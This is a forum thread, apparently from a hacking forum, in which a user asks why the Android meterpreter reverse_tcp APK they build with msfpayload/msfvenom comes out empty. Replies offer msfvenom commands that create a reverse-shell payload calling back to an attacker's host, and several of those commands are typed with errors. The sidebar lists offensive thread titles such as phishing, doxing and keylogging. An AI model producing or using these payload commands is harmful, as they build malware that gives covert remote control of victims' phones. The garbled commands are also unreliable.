Hi guys first thx to all who help me alot i have a simple problem with my msfvenom when i create my payload
msfpayload android/meterpreter/reverse_tcp LHOST=my ip LPORTmy port R > /root/name.apk
the seize of payload after create is 0 buyte
can any one eplain to me why and how to fix this problem btw i use backbox os
Forum Thread: [UNSOLVED] Msfvenom Android Payload Problem
- Hot
- Active
-
Forum Thread: How to Hack Android Phone Using Same Wifi 28 Replies
1 day ago -
Forum Thread: How to Hack Wireless Password Through MAC Address and IP Address 25 Replies
5 days ago -
Forum Thread: Complete Guide to Creating and Hosting a Phishing Page for Beginners 50 Replies
1 wk ago -
Forum Thread: HELP I Created an Apk for Hacking My Phone Using Kali Linux in Virtual Box How Can I Install That Apk on My Phone 18 Replies
3 wks ago -
Forum Thread: Mitm attack problem 2 Replies
4 wks ago -
Forum Thread: Hack and Track People's Device Constantly Using TRAPE 32 Replies
1 mo ago -
Metasploit Error: Handler Failed to Bind 40 Replies
1 mo ago -
Forum Thread: How to Know if You Are a Script Kiddie? 9 Replies
1 mo ago -
Forum Thread: How to Identify and Crack Hashes 8 Replies
1 mo ago -
Forum Thread: How to Hack School Website 8 Replies
1 mo ago -
Forum Thread: Whenever I Try "Airmon-Ng Start wlan0" There's an Error? 16 Replies
1 mo ago -
Forum Thread: How to Fix 'Failed to Detect and Mount CD-ROM' Problem When Installing Kali Linux 14 Replies
1 mo ago -
Forum Thread: Awesome Keylogging Script - BeeLogger 30 Replies
2 mo ago -
Forum Thread: Create and Use Android/Meterpreter/reverse_tcp APK with Msfvenom? 121 Replies
2 mo ago -
How to: Minecraft DoS'Ing with Python. 1 Replies
3 mo ago -
Forum Thread: Tools for Beginner Hacker 3 Replies
3 mo ago -
Forum Thread: How to Embed an Android Payload in an Image? 9 Replies
4 mo ago -
Forum Thread: Metasploit reverse_tcp Handler Problem 46 Replies
4 mo ago -
Forum Thread: HACK ANDROID with KALI USING PORT FORWARDING(portmap.io) 11 Replies
4 mo ago -
Forum Thread: Fix Initramfs Problem 5 Replies
4 mo ago
-
How To: Dox Anyone
-
How To: Brute-Force Nearly Any Website Login with Hatch
-
How To: Crack SSH Private Key Passwords with John the Ripper
-
How To: Top 10 Things to Do After Installing Kali Linux
-
How To: Scan for Vulnerabilities on Any Website Using Nikto
-
How To: Use Hash-Identifier to Determine Hash Types for Password Cracking
-
How To: Use Command Injection to Pop a Reverse Shell on a Web Server
-
How To: Check if Your Wireless Network Adapter Supports Monitor Mode & Packet Injection
-
How to Hack Wi-Fi: Stealing Wi-Fi Passwords with an Evil Twin Attack
-
How To: Crack Shadow Hashes After Getting Root on a Linux System
-
Android for Hackers: How to Turn an Android Phone into a Hacking Device Without Root
-
How To: The Hacks Behind Cracking, Part 1: How to Bypass Software Registration
-
How To: Make Spoofed Calls Using Any Phone Number You Want Right from Your Smartphone
-
How To: Hack Android Using Kali (Remotely)
-
How To: Buy the Best Wireless Network Adapter for Wi-Fi Hacking in 2019
-
How To: Hack WiFi Using a WPS Pixie Dust Attack
-
Mac for Hackers: How to Install iTerm2 Using the Terminal
-
How To: Gain SSH Access to Servers by Brute-Forcing Credentials
-
How To: Find Identifying Information from a Phone Number Using OSINT Tools
-
How To: Bypass File Upload Restrictions on Web Apps to Get a Shell
4 Responses
Intead of msfpayload you should use:
msfvenom -p android/meterpreter/reversetcp LHOST=yourip LPORT= your_port R > /root/name.apk
And it doesnt matter what os you are using. Msf is same everywhere :) good luck
yeah thx it's work fine but when i install it in my phone there's a problem look at this
https://null-byte.wonderhowto.com/forum/decrypt-android-payload-0175188/
i use this but same the seize is 0 byte of the payload
msfvenom -p android/meterpreter/reverse_tcp LHOST=my ip LPORTmy port R > /root/name.apk
you have to update your metasploit to last version then run thin
msfvenom -p android/meterpreter/reverse_http HOST=my ip LPORTmy port 0 /root/name.apk
Share Your Thoughts